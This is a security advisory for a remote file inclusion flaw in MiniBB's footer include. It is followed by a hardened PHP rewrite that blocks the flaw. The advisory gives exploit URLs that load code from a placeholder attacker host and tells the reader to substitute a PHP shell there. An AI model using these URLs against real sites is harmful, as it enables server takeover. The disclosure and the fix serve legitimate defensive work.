MiniBB <= Include File

Phara0h

Code:
MiniBB 2.0 RC3b (last version release) software has a remote file
inclusion found by
V4mu from Anomaly 1n The System
 
vendor: http://www.minibb.net
 
the bug is in index.php line 306:
 
if(isset($includeFooter)) include($includeFooter); else echo
ParseTpl(makeUp('main_footer'));
 
and in bb_admin.php line 712:
 
if(isset($includeFooter)) include($includeFooter); else echo
ParseTpl(makeUp('main_footer'));
 
Exploit:
 
www.target.com/[path_to_minibb]/index.php?includeFooter=http://[attacker]
 
and
 
www.target.com/[path_to_minibb]/bb_admin.php?includeFooter=http://[attacker]
 
------------------------------------------------------------------------------------------------------------------------
 
[A]nomaly [1]n [T]he [S]ystem
 
We are: 
 
V4mu <*> S0l4r1s <*> r3ckd4ll <*> paulinhu <*> nicked <*> Creative_MX
<*> Einst3in <*> magic
 
For manual use, in the minibb directory:
/index.php?includeFooter=http://[attacker]

Write phpshell in place of attacker so that it gets included.
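
A hardened form of the footer include quoted in the advisory, as an added example that is not MiniBB's code or the poster's. It assumes `$includeFooter` is reachable from the query string because it is never initialized (for instance with `register_globals` enabled); the `footers` directory, the allowlist entries and `resolveFooter()` are hypothetical names.

```php
<?php
// Added example: hardened footer include. Only $includeFooter, ParseTpl()
// and makeUp() come from the advisory; every other name is hypothetical.
// Defense in depth in php.ini: allow_url_include = Off (the default since
// PHP 5.2) stops include() from fetching http:// and ftp:// URLs.

const FOOTER_DIR = __DIR__ . '/footers';          // hypothetical local directory
const FOOTER_ALLOWLIST = [                        // logical name => local file
    'default' => 'default_footer.php',
    'custom'  => 'custom_footer.php',
];

/**
 * Map an allowlist key to a local file path, or null if it is not allowed.
 * The caller never supplies a path or URL, only a key.
 */
function resolveFooter(?string $name): ?string
{
    if ($name === null || !array_key_exists($name, FOOTER_ALLOWLIST)) {
        return null;
    }
    $base = realpath(FOOTER_DIR);
    $path = realpath(FOOTER_DIR . '/' . FOOTER_ALLOWLIST[$name]);
    // realpath() returns false for missing files; also confirm the resolved
    // path is still inside the footer directory (symlink or ../ tricks).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Initialize the variable before use so a request parameter cannot define
// it. In a real install the value would come from the site's own options.
$includeFooter = null;

$footer = resolveFooter($includeFooter);
if ($footer !== null) {
    include $footer;
} elseif (function_exists('ParseTpl')) {
    // MiniBB's template footer, as in the quoted lines. The guard only
    // lets this file run outside MiniBB without a fatal error.
    echo ParseTpl(makeUp('main_footer'));
}
```

A request such as `?includeFooter=http://...` then has no effect: the variable is overwritten before use, and any value that is not an allowlist key resolves to `null`.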
 